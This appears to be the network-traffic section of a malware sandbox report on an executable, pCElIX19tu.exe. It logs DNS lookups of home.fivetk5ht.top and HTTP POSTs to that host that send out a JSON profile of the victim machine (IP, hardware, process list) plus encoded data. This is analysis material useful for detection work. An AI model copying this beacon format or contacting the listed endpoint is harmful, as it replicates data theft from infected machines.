                                                          Dec 20, 2024 16:25:52.943917990 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.943928003 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.943938017 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.943952084 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.943960905 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.943970919 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.943979979 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.943989992 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944001913 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944010973 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944021940 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944031954 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944041967 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944051027 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944140911 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944152117 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944160938 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.944170952 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.950709105 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.950850010 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951109886 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951230049 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951241970 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951299906 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951364040 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951395035 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951404095 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951458931 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951541901 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951553106 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951564074 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951704979 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951714993 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951724052 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951889038 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951899052 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951909065 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951919079 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.951931000 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952070951 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952083111 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952091932 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952135086 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952238083 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952249050 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952435970 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952445984 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952455997 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.952610016 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.981369019 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:52.981381893 CET8049772185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:53.198292017 CET4977880192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:53.317948103 CET8049778185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:53.318063021 CET4977880192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:53.318262100 CET4977880192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:53.437813997 CET8049778185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:54.592251062 CET8049778185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:54.594377995 CET8049778185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:54.594443083 CET4977880192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:54.594595909 CET4977880192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:54.714267015 CET8049778185.121.15.192192.168.2.6

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 16:25:23.374166965 CET6141353192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:23.374785900 CET6141353192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:23.512010098 CET53614131.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:23.676886082 CET53614131.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:26.965297937 CET6028953192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:26.965420961 CET6028953192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:27.103391886 CET53602891.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:27.271620989 CET53602891.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:48.885912895 CET6183953192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:48.885992050 CET6183953192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:49.023905993 CET53618391.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:49.023953915 CET53618391.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:50.618187904 CET6258153192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:50.618243933 CET6258153192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:50.757004976 CET53625811.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:51.460655928 CET53625811.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:53.055821896 CET6258353192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:53.055876970 CET6258353192.168.2.61.1.1.1
                                                          Dec 20, 2024 16:25:53.197098017 CET53625831.1.1.1192.168.2.6
                                                          Dec 20, 2024 16:25:53.197529078 CET53625831.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 20, 2024 16:25:23.374166965 CET192.168.2.61.1.1.10x10cStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:23.374785900 CET192.168.2.61.1.1.10x2581Standard query (0)httpbin.org28IN (0x0001)false
                                                          Dec 20, 2024 16:25:26.965297937 CET192.168.2.61.1.1.10x340Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:26.965420961 CET192.168.2.61.1.1.10xb8abStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                          Dec 20, 2024 16:25:48.885912895 CET192.168.2.61.1.1.10x44a0Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:48.885992050 CET192.168.2.61.1.1.10xa882Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                          Dec 20, 2024 16:25:50.618187904 CET192.168.2.61.1.1.10x54a5Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:50.618243933 CET192.168.2.61.1.1.10x9dd6Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                          Dec 20, 2024 16:25:53.055821896 CET192.168.2.61.1.1.10x2316Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:53.055876970 CET192.168.2.61.1.1.10xa6d2Standard query (0)home.fivetk5ht.top28IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 20, 2024 16:25:23.676886082 CET1.1.1.1192.168.2.60x10cNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:23.676886082 CET1.1.1.1192.168.2.60x10cNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:27.103391886 CET1.1.1.1192.168.2.60x340No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:49.023953915 CET1.1.1.1192.168.2.60x44a0No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:50.757004976 CET1.1.1.1192.168.2.60x54a5No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                          Dec 20, 2024 16:25:53.197098017 CET1.1.1.1192.168.2.60x2316No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • httpbin.org
                                                          • home.fivetk5ht.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649710185.121.15.192804416C:\Users\user\Desktop\pCElIX19tu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:25:27.397761106 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 500222
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708325", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
                                                          Dec 20, 2024 16:25:27.517899036 CET7416OUTData Raw: 55 4b 65 56 31 59 4f 4d 55 35 75 64 53 6e 61 30 56 4a 72 39 79 38 42 50 42 4c 4e 76 48 76 6a 44 4d 65 44 38 6f 7a 7a 4c 38 68 78 47 57 63 4e 34 7a 69 57 72 6a 4d 79 6f 59 6e 45 30 5a 34 66 42 35 6e 6b 2b 56 79 77 31 4f 6e 68 66 66 39 74 4f 72 6e
                                                          Data Ascii: UKeV1YOMU5udSna0VJr9y8BPBLNvHvjDMeD8ozzL8hxGWcN4ziWrjMyoYnE0Z4fB5nk+Vyw1Onhff9tOrnFGpGUnGCp0al3zOKf4HUV\/Yz\/w6u\/YL\/wCiED\/w53xk\/wDnh0f8Orv2C\/8AohA\/8Od8ZP8A54dfzR\/xPjwn\/wBEDxF\/4c8t\/wDkPX+np\/XP\/FNrjb\/o5XC3\/hozb\/5P1\/p6fxzVHJ2\/H+l
                                                          Dec 20, 2024 16:25:27.567962885 CET7416OUTData Raw: 66 54 45 76 66 44 31 39 70 42 73 70 49 5c 2f 48 4f 72 53 6a 5c 2f 49 6a 36 63 6e 69 4c 78 72 58 38 54 66 2b 49 5a 78 7a 79 4e 50 68 44 42 59 4c 68 37 69 48 41 5a 51 38 74 79 74 71 47 66 56 73 76 7a 4c 44 66 57 35 5a 69 38 43 38 30 6b 36 74 48 48
                                                          Data Ascii: fTEvfD19pBspI\/HOrSj\/Ij6cniLxrX8Tf+IZxzyNPhDBYLh7iHAZQ8tytqGfVsvzLDfW5Zi8C80k6tHHYigqE8bLBx9rGf1dThGpH+8voi0MwyrFUM64SzOhw9xhxFSzbhaGbYmjTx1DF4etisDjsJkssLjqeLwOGeY5nlmXUKWNhg\/b067pxnWjhqldP9Cf8AiJW\/6st\/82M\/\/ERX7Sf8E8f23rX9vn4H698Y7f4bXH
                                                          Dec 20, 2024 16:25:27.568023920 CET2472OUTData Raw: 36 2b 63 30 2b 4c 4d 54 68 4b 55 34 31 63 78 35 50 71 4f 49 72 38 31 61 70 56 6a 47 4f 45 72 56 4b 6b 4b 56 44 44 77 6e 48 44 34 61 6a 44 46 31 6e 43 68 52 70 77 6a 5a 4b 4d 56 38 6f 5c 2f 74 44 58 5c 2f 6b 2b 46 39 48 30 39 57 49 61 2b 31 6f 54
                                                          Data Ascii: 6+c0+LMThKU41cx5PqOIr81apVjGOErVKkKVDDwnHD4ajDF1nChRpwjZKMV8o\/tDX\/k+F9H09WIa+1oTsBjDQ2NncB1Oef9ddW78d0HOOD8f7dvGMd\/Wvon9orVbS48QaFo1vf2N5Jpmn3dzOLK6iulil1C5SExyNCziOULpyM0MgSVFZGZQroT87V\/ph9HnBUcL4T8OYilKE\/7VnmWaTnTalGaxGY4mlQkpJvmvhKGGd9
                                                          Dec 20, 2024 16:25:27.573295116 CET7416OUTData Raw: 34 63 38 48 58 6d 69 2b 50 4e 57 5c 2f 34 59 4c 5c 2f 5a 2b 38 52 66 38 4c 48 38 57 7a 65 50 76 48 48 69 47 30 38 61 5c 2f 59 4e 53 38 53 52 57 5c 2f 68 44 37 46 34 47 31 37 77 58 38 50 50 2b 45 62 30 5a 70 39 4d 75 50 2b 45 43 5c 2f 34 53 32 53
                                                          Data Ascii: 4c8HXmi+PNW\/4YL\/Z+8Rf8LH8WzePvHHiG08a\/YNS8SRW\/hD7F4G17wX8PP+Eb0Zp9MuP+EC\/4S2SUax4p1WCH8wP+C2\/\/ACdX8P8A\/s3zwp\/6sf4r1\/UfX8uH\/Bbf\/k6v4f8A\/ZvnhT\/1Y\/xXr+qPomQUPpAcAWc3d8Ur3qlSe3BHEqVueUrPu1Zyesrs8P6ZmBo4P6Mfih7GeMnzw4Hg\/rWYY\/H2VHj\
                                                          Dec 20, 2024 16:25:27.637671947 CET4944OUTData Raw: 47 6b 61 6f 4d 4c 47 39 37 59 75 42 49 32 6a 61 34 6b 4b 71 6b 47 71 32 73 62 65 5a 35 63 45 57 6f 32 32 6f 57 6b 4b 57 77 39 37 38 4f 66 38 46 4d 5c 2f 77 42 6f 37 77 6a 34 31 38 52 61 6e 62 36 33 59 65 4f 76 41 64 35 34 72 31 5c 2f 56 5c 2f 44
                                                          Data Ascii: GkaoMLG97YuBI2ja4kKqkGq2sbeZ5cEWo22oWkKWw978Of8FM\/wBo7wj418Ranb63YeOvAd54r1\/V\/DPgz4laZHrFx4Z0PUtXurvTNL0jxPptxYeKtHm0vTpLWztBp+vf2fZPaQfZrNoYUjP5WaB45tdd0EeIYLnwxZ2sX7Ofi39p2807Udd1ODXLP4feC\/2mrn9k7WdOmsYvC89r\/wAJV\/wtW1m+y2P9ojSZNBR7ufXL
                                                          Dec 20, 2024 16:25:27.637748957 CET7416OUTData Raw: 76 77 76 44 34 4f 6c 65 44 52 66 69 58 38 49 66 69 68 65 4a 2b 7a 5a 61 5c 2f 74 57 48 53 50 68 37 64 66 47 75 50 78 4b 33 77 71 31 7a 34 6e 65 42 76 68 50 34 48 62 5c 2f 68 46 50 69 4a 38 43 50 68 39 34 6b 6a 38 54 66 45 6e 78 48 34 5c 2f 30 66
                                                          Data Ascii: vwvD4OleDRfiX8IfiheJ+zZa\/tWHSPh7dfGuPxK3wq1z4neBvhP4Hb\/hFPiJ8CPh94kj8TfEnxH4\/0fVPAGhXOmW7+IfB6DxZHcw6Rr\/gqbxV+dPw\/+hfCFKrVy2lh6FfHY3LKWJxWb+KGFwksyyyGMq5jgPreJzGlho43Awy7HPF4aVVVsO8HiYVYRlSnFfrUPEv6flWtXw2HzWvisXhsJgcwr4LB5J4PY3HU8BmeIwOF
                                                          Dec 20, 2024 16:25:27.637810946 CET2472OUTData Raw: 32 33 50 32 57 39 50 31 4c 57 64 4b 2b 4a 6c 7a 50 34 68 38 54 5c 2f 43 5c 2f 39 71 7a 78 78 38 42 76 47 5c 2f 68 48 78 64 34 71 30 62 2b 30 5c 2f 67 33 38 63 50 68 62 38 51 76 32 4e 62 2b 5c 2f 38 5a 61 52 34 6e 30 32 35 54 58 6b 38 4e 36 76 38
                                                          Data Ascii: 23P2W9P1LWdK+JlzP4h8T\/C\/9qzxx8BvG\/hHxd4q0b+0\/g38cPhb8Qv2Nb+\/8ZaR4n025TXk8N6v8E\/iP4Cm1XwrbXeoapoPiHTPC19J6n4M+M\/7N3hrUL3Rfg542+CfwQ+C\/gf8A4KT\/ABS+N3iP4YfEX9lv4neOvin4+\/Z48RfAr9mrwH4hm\/Yp+Itp8EPip4n\/AGavGPxA8W\/D34t2vwq1HTv2lP2Z\/id8
                                                          Dec 20, 2024 16:25:27.734848022 CET27192OUTData Raw: 57 43 7a 50 4b 38 54 56 72 55 6f 54 77 58 45 6b 63 52 44 47 30 49 56 36 55 36 57 4a 70 54 56 50 46 54 6a 54 71 30 61 74 4f 72 54 6e 47 46 53 46 53 4d 34 49 2b 65 50 45 58 78 39 5c 2f 5a 6d 74 76 47 50 6a 54 78 56 38 4a 66 67 78 38 61 76 45 39 7a
                                                          Data Ascii: WCzPK8TVrUoTwXEkcRDG0IV6U6WJpTVPFTjTq0atOrTnGFSFSM4I+ePEXx9\/ZmtvGPjTxV8Jfgx8avE9zq3\/BQTUv2pfBvhH4BeNfDn7IPhr4XfDf8AZnu5tK\/Zj8Ha\/oHir9kb49+G\/FPh\/wAcXnjH4meO9U8JeBx4Qs9F0W58HaXrzW2vW91pOleQ+KPDvwD+KM\/jj4Rab8U\/D\/wn+GXwl\/aq+N\/x5\/Zp8T\/
                                                          Dec 20, 2024 16:25:27.798791885 CET7416OUTData Raw: 78 55 48 79 65 58 38 37 37 48 5c 2f 31 76 58 7a 5c 2f 31 39 4d 63 66 68 7a 51 62 65 5c 2f 38 41 33 66 78 49 66 37 6a 75 2b 78 5c 2f 2b 57 57 4f 5c 2f 76 5c 2f 6e 50 34 64 32 66 33 39 6e 7a 5c 2f 77 43 33 5c 2f 77 41 39 75 74 54 53 66 75 39 36 53
                                                          Data Ascii: xUHyeX877H\/1vXz\/19McfhzQbe\/8A3fxIf7ju+x\/+WWO\/v\/nP4d2f39nz\/wC3\/wA9utTSfu96SP8AJJ\/z0\/5Y\/wD1+cf\/AKqZ8rK+149\/leb5f\/LCC3\/z+GPrQaU6nyt+H\/A36akO378O\/wCTzf3uP8M9f85xTPMTy5v4\/M\/dS\/j69f8AJxT\/AJ1jT+P91+vGf89Kf8jffaRM\/uvk\/f8At\/h\/j
                                                          Dec 20, 2024 16:25:27.958807945 CET1236OUTData Raw: 55 56 39 75 37 6a 47 65 5c 2f 70 55 4d 6b 61 5c 2f 6e 2b 6f 5c 2f 77 41 2b 75 65 74 58 5a 4f 6a 66 58 2b 74 51 55 47 70 6e 30 33 48 7a 4f 50 77 5c 2f 50 72 56 6d 52 66 78 49 35 48 76 5c 2f 41 4a 5c 2f 70 55 50 66 2b 5c 2f 77 44 6e 6b 5c 2f 79 35
                                                          Data Ascii: UV9u7jGe\/pUMka\/n+o\/wA+uetXZOjfX+tQUGpn03HzOPw\/PrVmRfxI5Hv\/AJ\/pUPf+\/wDnk\/y5\/Sg7qXT\/ABf5FZv7nKL5v5f5\/T2qCRE6J\/L+vv8A5HrakX\/Y7emP\/wBX1\/wpnPlvv54\/55Y\/L0rPn8vx\/wCAaw3+X6opj\/lp+P8AWq0ny\/c7\/venb\/635\/rWgfuL9T\/WoJI028+WP8+2M9q0O


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.649766185.121.15.192804416C:\Users\user\Desktop\pCElIX19tu.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:25:49.145255089 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 500222
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708325", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
                                                          Dec 20, 2024 16:25:49.265105009 CET2472OUTData Raw: 55 4b 65 56 31 59 4f 4d 55 35 75 64 53 6e 61 30 56 4a 72 39 79 38 42 50 42 4c 4e 76 48 76 6a 44 4d 65 44 38 6f 7a 7a 4c 38 68 78 47 57 63 4e 34 7a 69 57 72 6a 4d 79 6f 59 6e 45 30 5a 34 66 42 35 6e 6b 2b 56 79 77 31 4f 6e 68 66 66 39 74 4f 72 6e
                                                          Data Ascii: UKeV1YOMU5udSna0VJr9y8BPBLNvHvjDMeD8ozzL8hxGWcN4ziWrjMyoYnE0Z4fB5nk+Vyw1Onhff9tOrnFGpGUnGCp0al3zOKf4HUV\/Yz\/w6u\/YL\/wCiED\/w53xk\/wDnh0f8Orv2C\/8AohA\/8Od8ZP8A54dfzR\/xPjwn\/wBEDxF\/4c8t\/wDkPX+np\/XP\/FNrjb\/o5XC3\/hozb\/5P1\/p6fxzVHJ2\/H+l
                                                          Dec 20, 2024 16:25:49.265167952 CET2472OUTData Raw: 2f 41 46 7a 6e 5c 2f 57 5c 2f 35 5c 2f 77 41 39 71 6c 35 7a 76 5c 2f 65 66 35 35 2b 31 66 31 5c 2f 2b 76 54 5a 49 7a 38 6e 7a 34 63 66 35 5c 2f 4f 6f 6e 74 38 5c 2f 30 5a 76 54 36 5c 2f 4c 39 53 48 7a 4e 7a 62 50 34 7a 5c 2f 77 41 38 7a 5c 2f 72
                                                          Data Ascii: /AFzn\/W\/5\/wA9ql5zv\/ef55+1f1\/+vTZIz8nz4cf5\/Oont8\/0ZvT6\/L9SHzNzbP4z\/wA8z\/rs\/wCfX3qGpm3yF4+0n1\/c\/Tr\/AJ7c0zrv+STf\/wA84\/Tn\/OeKyOin1+X6lY7PMdx\/2zkjHPv\/AJ+n0psW+Tyf4E\/6Z8f5z\/nipWzJvT\/yH\/j9f88VDj+D+PyvKl\/df8u\/+enpiug0IfM3f7Yki
                                                          Dec 20, 2024 16:25:49.265223980 CET4944OUTData Raw: 5c 2f 70 57 66 53 6e 79 52 75 75 7a 59 6e 38 5c 2f 74 48 31 37 65 33 5c 2f 31 7a 57 5a 6f 66 75 51 5c 2f 33 6a 2b 48 38 68 54 61 65 5c 2f 58 38 50 36 6d 6d 56 78 63 6a 38 76 36 2b 52 5c 2f 6b 2b 66 72 70 2b 78 42 34 6a 75 35 5c 2f 67 76 71 4f 6a
                                                          Data Ascii: \/pWfSnyRuuzYn8\/tH17e3\/1zWZofuQ\/3j+H8hTae\/X8P6mmVxcj8v6+R\/k+frp+xB4ju5\/gvqOjLcM1pp\/i\/V9Pu9Mn23On3ttNa6Xq0a3+mXJnsb22ebULlRDdWzwOyS5iY73f33Xvhb8NPEvmSXvhZdEvpN7tqXg26XQGklbiPztGlttS8MpaxdTbaToujSy4wbxCS1fBv7G3jrTvCHgv4yahrRuf7J8LQaL4rvB
                                                          Dec 20, 2024 16:25:49.265240908 CET2472OUTData Raw: 71 6b 35 31 47 75 61 62 62 5c 2f 79 74 2b 6e 66 69 71 6d 59 65 4a 76 68 5c 2f 6d 64 65 4e 4e 59 72 4d 5c 2f 42 6e 68 4c 4d 4d 5a 4f 6e 54 6a 54 6a 56 78 57 4a 7a 7a 69 32 56 53 70 79 78 38 75 57 45 62 74 75 4e 4f 45 49 4a 38 73 49 70 52 30 56 4a
                                                          Data Ascii: qk51Guabb\/yt+nfiqmYeJvh\/mdeNNYrM\/BnhLMMZOnTjTjVxWJzzi2VSpyx8uWEbtuNOEIJ8sIpR0VJ5fv8Ap\/8AXqOv60P4o9p5fj\/wCPy\/f9P\/AK9R1YooNCvUcnb8auVXoAr0VYpsnPz9Mf0\/qO9B0ENFFFAEWw+3+fwplWKr1p7Pz\/D\/AIJ0BUcnb8f6VJTWXdR7Pz\/D\/ggQ03Yvp\/P\/ABp1FHs\/P8P+
